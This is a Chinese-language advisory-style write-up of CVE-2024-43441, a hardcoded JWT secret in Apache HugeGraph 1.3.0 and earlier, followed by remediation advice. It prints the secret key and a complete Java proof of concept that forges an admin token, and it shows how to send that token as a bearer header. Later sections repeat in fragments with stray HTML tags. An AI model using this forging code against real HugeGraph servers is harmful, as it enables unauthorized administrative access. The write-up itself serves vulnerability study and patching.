Apache HugeGraph 硬编码漏洞 (CVE-2024-43441) 分析与复现指南<\/h1>

漏洞概述<\/h2>
Apache HugeGraph 1.3.0及之前版本存在一个身份验证绕过漏洞(CVE-2024-43441)，原因是系统中使用了硬编码的JWT(JSON Web Token)密钥。攻击者可以利用这个硬编码密钥伪造任意用户的Token，从而绕过身份验证机制，获得未授权的系统访问权限。<\/p>

漏洞原理<\/h2>

JWT机制简介<\/h3>

JWT是一种用于身份验证的开放标准(RFC 7519)，它由三部分组成：<\/p>

Signature - 用于验证令牌完整性的签名<\/li> <\/ol>

漏洞具体原因<\/h3>

HugeGraph在TokenGenerator.java<\/code>中使用了一个硬编码的密钥FXQXbJtbCLxODc6tGci732pkH1cyf8Qg<\/code>来生成和验证JWT令牌。由于密钥是固定的，攻击者可以：<\/p>


获取默认密钥<\/li>
构造任意用户的payload<\/li>
使用硬编码密钥生成合法的JWT令牌<\/li>
使用该令牌冒充其他用户<\/li>
<\/ol>
环境搭建<\/h2>
使用Docker搭建漏洞环境<\/h3>
docker run -itd --name=<\/span>graph -e PASSWORD=<\/span>123456<\/span> -p 8080:8080 hugegraph\/hugegraph:1.3.0
<\/span><\/span><\/code><\/pre>启用身份验证<\/h3>
默认情况下HugeGraph不启用身份验证，需要参考官方文档<\/a>手动开启。<\/p>
启用后，未认证访问会返回401错误。<\/p>
漏洞分析<\/h2>
关键代码位置<\/h3>
漏洞修复commit: 03b40a52446218c83e98cb43020e0593a744a246<\/a><\/p>
关键代码文件: hugegraph-server\/hugegraph-core\/src\/main\/java\/org\/apache\/hugegraph\/auth\/TokenGenerator.java<\/code><\/p>
令牌生成流程<\/h3>
String secretKey =<\/span> config.<\/span>get<\/span>(<\/span>AuthOptions.<\/span>AUTH_TOKEN_SECRET<\/span>);<\/span>
<\/span><\/span>this<\/span>.<\/span>key<\/span> =<\/span> Keys.<\/span>hmacShaKeyFor<\/span>(<\/span>secretKey.<\/span>getBytes<\/span>(<\/span>StandardCharsets.<\/span>UTF_8<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>return<\/span> Jwts.<\/span>builder<\/span>()<\/span>
<\/span><\/span>    .<\/span>setClaims<\/span>(<\/span>payload)<\/span>
<\/span><\/span>    .<\/span>setExpiration<\/span>(<\/span>new<\/span> Date(<\/span>System.<\/span>currentTimeMillis<\/span>()<\/span> +<\/span> expire))<\/span>
<\/span><\/span>    .<\/span>signWith<\/span>(<\/span>this<\/span>.<\/span>key<\/span>,<\/span> SignatureAlgorithm.<\/span>HS256<\/span>)<\/span>
<\/span><\/span>    .<\/span>compact<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>令牌payload结构<\/h3>
在StandardAuthManager.java<\/code>中，令牌payload包含：<\/p>

user_name: 用户名<\/li>
user_id: 用户ID<\/li>
<\/ul>
默认管理员用户：<\/p>

用户名: admin<\/li>
用户ID: -30<\/li>
<\/ul>
漏洞复现<\/h2>
所需依赖<\/h3>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>io.jsonwebtoken<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>jjwt-api<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>0.11.5<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>io.jsonwebtoken<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>jjwt-impl<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>0.11.5<\/version><\/span>
<\/span><\/span>    <scope><\/span>runtime<\/scope><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>io.jsonwebtoken<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>jjwt-jackson<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>0.11.5<\/version><\/span>
<\/span><\/span>    <scope><\/span>runtime<\/scope><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>生成伪造令牌的Java代码<\/h3>
import<\/span> io.jsonwebtoken.Jwts;<\/span>
<\/span><\/span>import<\/span> io.jsonwebtoken.SignatureAlgorithm;<\/span>
<\/span><\/span>import<\/span> io.jsonwebtoken.security.Keys;<\/span>
<\/span><\/span>import<\/span> javax.crypto.SecretKey;<\/span>
<\/span><\/span>import<\/span> java.nio.charset.StandardCharsets;<\/span>
<\/span><\/span>import<\/span> java.util.Date;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        String secretKey =<\/span> "FXQXbJtbCLxODc6tGci732pkH1cyf8Qg"<\/span>;<\/span>
<\/span><\/span>        SecretKey key =<\/span> Keys.<\/span>hmacShaKeyFor<\/span>(<\/span>secretKey.<\/span>getBytes<\/span>(<\/span>StandardCharsets.<\/span>UTF_8<\/span>));<\/span>
<\/span><\/span>        
<\/span><\/span>        Map<<\/span>String,<\/span> String><\/span> payload =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        payload.<\/span>put<\/span>(<\/span>"user_name"<\/span>,<\/span> "admin"<\/span>);<\/span>
<\/span><\/span>        payload.<\/span>put<\/span>(<\/span>"user_id"<\/span>,<\/span> "-30"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        String token =<\/span> Jwts.<\/span>builder<\/span>()<\/span>
<\/span><\/span>            .<\/span>setClaims<\/span>(<\/span>payload)<\/span>
<\/span><\/span>            .<\/span>setExpiration<\/span>(<\/span>new<\/span> Date(<\/span>System.<\/span>currentTimeMillis<\/span>()<\/span> +<\/span> 36000<\/span>))<\/span>
<\/span><\/span>            .<\/span>signWith<\/span>(<\/span>key,<\/span> SignatureAlgorithm.<\/span>HS256<\/span>)<\/span>
<\/span><\/span>            .<\/span>compact<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>token);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>使用伪造的令牌<\/h3>
将生成的令牌添加到HTTP请求的Authorization头中：<\/p>
Authorization: Bearer <生成的JWT令牌>
<\/code><\/pre>
修复方案<\/h2>

升级到修复版本(1.3.0之后的版本)<\/li>
如果无法立即升级，可以手动修改AUTH_TOKEN_SECRET<\/code>配置，使用随机生成的Base64字符串作为密钥<\/li>
<\/ol>
修复后的版本使用随机生成的密钥而非硬编码密钥。<\/p>
总结<\/h2>
该漏洞由于使用硬编码的JWT密钥，导致攻击者可以伪造任意用户的合法令牌。通过分析修复commit和关键代码，我们可以理解漏洞原理并复现攻击过程。建议所有使用受影响版本的用户立即升级或修改默认密钥。<\/p>

Apache HugeGraph 硬编码漏洞 (CVE-2024-43441) 分析与复现指南<\/h1>

漏洞原理<\/h2>

环境搭建<\/h2>

启用身份验证<\/h3> 默认情况下HugeGraph不启用身份验证，需要参考官方文档<\/a>手动开启。<\/p> 启用后，未认证访问会返回401错误。<\/p>

关键代码位置<\/h3> 漏洞修复commit: 03b40a52446218c83e98cb43020e0593a744a246<\/a><\/p> 关键代码文件: hugegraph-server\/hugegraph-core\/src\/main\/java\/org\/apache\/hugegraph\/auth\/TokenGenerator.java<\/code><\/p>

漏洞复现<\/h2>

总结<\/h2> 该漏洞由于使用硬编码的JWT密钥，导致攻击者可以伪造任意用户的合法令牌。通过分析修复commit和关键代码，我们可以理解漏洞原理并复现攻击过程。建议所有使用受影响版本的用户立即升级或修改默认密钥。<\/p>

启用身份验证<\/h3>
默认情况下HugeGraph不启用身份验证，需要参考官方文档<\/a>手动开启。<\/p>
启用后，未认证访问会返回401错误。<\/p>

关键代码位置<\/h3>
漏洞修复commit: 03b40a52446218c83e98cb43020e0593a744a246<\/a><\/p>
关键代码文件: `hugegraph-server\/hugegraph-core\/src\/main\/java\/org\/apache\/hugegraph\/auth\/TokenGenerator.java<\/code><\/p>`

总结<\/h2>
该漏洞由于使用硬编码的JWT密钥，导致攻击者可以伪造任意用户的合法令牌。通过分析修复commit和关键代码，我们可以理解漏洞原理并复现攻击过程。建议所有使用受影响版本的用户立即升级或修改默认密钥。<\/p>